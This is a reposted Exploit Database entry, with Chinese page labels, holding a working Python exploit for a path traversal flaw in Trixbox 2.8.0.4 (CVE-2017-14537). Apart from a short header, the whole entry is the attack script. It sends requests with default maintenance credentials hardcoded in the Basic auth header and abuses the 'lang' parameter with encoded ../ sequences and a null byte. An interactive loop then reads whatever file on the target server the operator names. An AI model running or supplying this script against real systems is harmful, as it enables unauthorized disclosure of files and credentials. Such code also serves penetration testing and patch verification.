Trixbox 2.8.0.4 – ‘lang’ Path Traversal

• Exploit Database
• 13 阅读

• 作者： Ron Jost
  日期： 2021-05-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49914/

• # Exploit Title: Trixbox 2.8.0.4 - 'lang' Path Traversal
  # Date: 27.05.2021
  # Exploit Author: Ron Jost (Hacker5preme)
  # Credits to: https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/
  # Credits to: Sachin Wagh
  # Vendor Homepage: https://sourceforge.net/projects/asteriskathome/
  # Software Link: https://sourceforge.net/projects/asteriskathome/files/trixbox%20CE/trixbox%202.8/trixbox-2.8.0.4.iso/download
  # Version: 2.8.0.4
  # Tested on: Xubuntu 20.04
  # CVE: CVE-2017-14537
  
  '''
  Description:
  trixbox 2.8.0.4 has path traversal via the xajaxargs array parameter to /maint/index.php?packages or the
  lang parameter to /maint/modules/home/index.php.
  '''
  
  
  '''
  Import required modules:
  '''
  import requests
  import sys
  import urllib.parse
  
  
  '''
  User-Input:
  '''
  target_ip = sys.argv[1]
  target_port = sys.argv[2]
  
  
  '''
  Construct malicious request:
  '''
  # Constructing header:
  header = {
  'Host': target_ip,
  'User-Agent': 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0',
  'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
  'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
  'Accept-Encoding': 'gzip, deflate',
  'Connection': 'keep-alive',
  'Cookie': 'template=classic; lng=en; lng=en',
  'Upgrade-Insecure-Requests': '1',
  'Authorization': 'Basic bWFpbnQ6cGFzc3dvcmQ=',
  }
  
  # Constructing malicious link (payload):
  base_link = 'http://' + target_ip + ':' + target_port
  base_link_addon_1 = '/maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..'
  base_link_addon_3 = '%00english'
  print('')
  base_link_addon_2 = input('Input the filepath or input EXIT: ')
  
  
  
  '''
  EXPLOIT:
  '''
  while base_link_addon_2 != 'EXIT':
  base_link_addon_2_coded = urllib.parse.quote(base_link_addon_2, safe='')
  exploit_link = base_link + base_link_addon_1 + base_link_addon_2_coded + base_link_addon_3
  print('')
  exploit = requests.post(exploit_link, headers=header)
  print('Contents of ' + base_link_addon_2 + ':')
  for data in exploit.iter_lines():
  data = data.decode('utf-8')
  if data != '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">':
  print(data)
  else:
  break
  print('')
  base_link_addon_2 = input('Input the filepath or input EXIT: ')